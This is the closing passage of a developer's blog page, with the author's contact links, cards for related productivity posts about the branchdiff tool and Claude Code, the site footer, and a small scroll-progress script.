<p>I am always excited to hear what you are building. If this guide helped, or if you have questions about building self-review habits into your workflow:</p>
<ul>
<li><strong>Website</strong>: <a href="https://encryptioner.github.io" target="_blank" rel="noopener noreferrer">encryptioner.github.io</a></li>
<li><strong>LinkedIn</strong>: <a href="https://www.linkedin.com/in/mir-mursalin-ankur" target="_blank" rel="noopener noreferrer">Mir Mursalin Ankur</a></li>
<li><strong>GitHub</strong>: <a href="https://github.com/Encryptioner" target="_blank" rel="noopener noreferrer">@Encryptioner</a></li>
<li><strong>X (Twitter)</strong>: <a href="https://twitter.com/AnkurMursalin" target="_blank" rel="noopener noreferrer">@AnkurMursalin</a></li>
<li><strong>Technical Writing</strong>: <a href="https://nerddevs.com/author/ankur/" target="_blank" rel="noopener noreferrer">Nerddevs</a></li>
<li><strong>Support</strong>: <a href="https://www.supportkori.com/mirmursalinankur" target="_blank" rel="noopener noreferrer">SupportKori</a></li>
</ul>
<p><em>branchdiff releases, install guide, and changelog: <a href="https://encryptioner.github.io/branchdiff-releases/" target="_blank" rel="noopener noreferrer">encryptioner.github.io/branchdiff-releases</a></em></p></div>  <footer class="article-foot"> <a class="pill" href="/blogs/">← All writing</a> <a class="pill" href="/blogs/?topic=Productivity">
More on Productivity </a> </footer> </article> <section class="shell sec"> <h2>More in Productivity</h2> <div class="grid"> <article class="card" data-type="blog" data-topic="Productivity" data-slug="manage-the-whole-pr-lifecycle-without-leaving-the-terminal-branchdiff-s-pr-sync-and" data-search="manage the whole pr lifecycle without leaving the terminal - branchdiff's pr, sync, and session commands productivity branchdiff your claude code skill just finished a review pass. it read the diff, posted three [must-fix] comments and two [suggestion]s via branchdiff agent comment, and…"> <div class="tags"> <span class="tag tag--type"> Blog </span> <span class="tag">Productivity</span> <span class="tag">branchdiff</span> </div> <h3><a href="/blogs/blog/manage-the-whole-pr-lifecycle-without-leaving-the-terminal-branchdiff-s-pr-sync-and">Manage the Whole PR Lifecycle Without Leaving the Terminal - branchdiff&#39;s pr, sync, and session Commands</a></h3> <p class="excerpt">Your Claude Code skill just finished a review pass. It read the diff, posted three [must-fix] comments and two [suggestion]s via branchdiff agent comment, and…</p> <div class="meta"> <time datetime="2026-08-30">30 Aug 2026</time> <span>12 min read</span> </div> </article><article class="card" data-type="blog" data-topic="Productivity" data-slug="token-economics-better-results-fewer-tokens" data-search="token economics: better results, fewer tokens productivity claude code i've spent 7+ years shipping production typescript and node systems, and the last couple of those leading a team at nerddevs that now writes more code through…"> <div class="tags"> <span class="tag tag--type"> Blog </span> <span class="tag">Productivity</span> <span class="tag">Claude Code</span> </div> <h3><a href="/blogs/blog/token-economics-better-results-fewer-tokens">Token Economics: Better Results, Fewer Tokens</a></h3> <p class="excerpt">I&#39;ve spent 7+ years shipping production TypeScript and Node systems, and the last couple of those leading a team at Nerddevs that now writes more code through…</p> <div class="meta"> <time datetime="2026-08-30">30 Aug 2026</time> <span>36 min read</span> </div> </article><article class="card" data-type="blog" data-topic="Productivity" data-slug="when-your-desktop-needs-you-free-notifications-from-mac-ubuntu-to-your-phone-and-why-you" data-search="when your desktop needs you — free notifications from mac &#38; ubuntu to your phone productivity a build's been running for twenty minutes. an agent is waiting on your &#34;looks good.&#34; a backup either succeeded at 2 a.m. or didn't. your phone is in your…"> <div class="tags"> <span class="tag tag--type"> Blog </span> <span class="tag">Productivity</span>  </div> <h3><a href="/blogs/blog/when-your-desktop-needs-you-free-notifications-from-mac-ubuntu-to-your-phone-and-why-you">When Your Desktop Needs You — Free Notifications From Mac &amp; Ubuntu to Your Phone</a></h3> <p class="excerpt">A build&#39;s been running for twenty minutes. An agent is waiting on your &quot;looks good.&quot; A backup either succeeded at 2 a.m. or didn&#39;t. Your phone is in your…</p> <div class="meta"> <time datetime="2026-08-30">30 Aug 2026</time> <span>14 min read</span> </div> </article> </div> </section><button type="button" class="to-top" data-to-top hidden aria-label="Back to top">↑</button>  </main> <footer class="site"> <div class="shell foot-grid"> <section class="foot-about"> <a class="brand" href="/blogs/"> <svg class="logo" width="26" height="26" viewBox="0 0 32 32" aria-hidden="true" focusable="false"> <rect width="32" height="32" rx="9" fill="var(--accent)"></rect> <path d="M9.4 23.6 16 8.4l6.6 15.2" fill="none" stroke="var(--on-accent)" stroke-width="2.9" stroke-linecap="round" stroke-linejoin="round"></path> <path d="M12.5 18.7h7" fill="none" stroke="var(--on-accent)" stroke-width="2.9" stroke-linecap="round"></path> </svg> <span>Ankur’s Writing</span> </a> <p>I lead full-stack teams at NerdDevs. These are the notes I keep while building — on system design, developer tooling, and getting real work out of AI agents.</p> <a class="foot-cta" href="https://encryptioner.github.io" rel="me noopener">
Visit my portfolio
<span aria-hidden="true">↗</span> </a> <nav class="foot-social" aria-label="Elsewhere"> <span class="label">Elsewhere</span> <a href="https://github.com/Encryptioner" rel="me noopener" target="_blank"> GitHub </a> <span class="sep" aria-hidden="true">·</span><a href="https://www.linkedin.com/in/mir-mursalin-ankur" rel="me noopener" target="_blank"> LinkedIn </a> <span class="sep" aria-hidden="true">·</span><a href="https://dev.to/mir_mursalin_ankur" rel="me noopener" target="_blank"> DEV </a> <span class="sep" aria-hidden="true">·</span><a href="https://mir-mursalin-ankur.medium.com/" rel="me noopener" target="_blank"> Medium </a> <span class="sep" aria-hidden="true">·</span><a href="https://twitter.com/AnkurMursalin" rel="me noopener" target="_blank"> X / Twitter </a> <span class="sep" aria-hidden="true">·</span><a href="https://nerddevs.com/author/ankur/" rel="me noopener" target="_blank"> NerdDevs </a>  </nav> </section> <nav class="foot-col" aria-label="Browse"> <h2>Browse</h2> <ul> <li><a href="/blogs/">All</a></li><li><a href="/blogs/?type=blog">Blogs</a></li><li><a href="/blogs/?type=presentation">Presentations</a></li><li><a href="/blogs/search">Search</a></li> </ul> </nav> <nav class="foot-col" aria-label="Topics"> <h2>Topics</h2> <ul> <li> <a href="/blogs/?topic=Career">Career</a> </li><li> <a href="/blogs/?topic=Coding%20Challenges">Coding Challenges</a> </li><li> <a href="/blogs/?topic=Node.js">Node.js</a> </li><li> <a href="/blogs/?topic=Presentations">Presentations</a> </li><li> <a href="/blogs/?topic=Productivity">Productivity</a> </li><li> <a href="/blogs/?topic=Software%20Architecture">Software Architecture</a> </li><li> <a href="/blogs/?topic=Software%20Business">Software Business</a> </li> </ul> </nav> </div> <div class="shell foot-bottom"> <span>© 2026 Mir Mursalin Ankur — Lead Software Engineer</span> <span> 35 posts · 7 presentations ·
<a href="https://github.com/Encryptioner/blogs" rel="noopener" target="_blank">source on GitHub</a> </span> </div> </footer> <script type="module" src="/blogs/_astro/Base.astro_astro_type_script_index_0_lang.DcYY7i-X.js"></script> </body> </html> <script type="module">const t=document.querySelector("[data-progress]"),r=document.querySelector("[data-to-top]"),o=document.querySelector(".prose");if(t&&o){const s=()=>{const i=o.offsetTop,c=o.scrollHeight-window.innerHeight+120,a=window.scrollY-i,d=c>0?Math.min(Math.max(a/c,0),1):0;t.style.transform=`scaleX(${d})`,r&&(r.hidden=window.scrollY<window.innerHeight)};let e=!1;const n=()=>{e||(e=!0,requestAnimationFrame(()=>{s(),e=!1}))};t.hidden=!1,addEventListener("scroll",n,{passive:!0}),addEventListener("resize",n,{passive:!0}),s()}r?.addEventListener("click",()=>{scrollTo({top:0,behavior:matchMedia("(prefers-reduced-motion: reduce)").matches?"auto":"smooth"})});</script>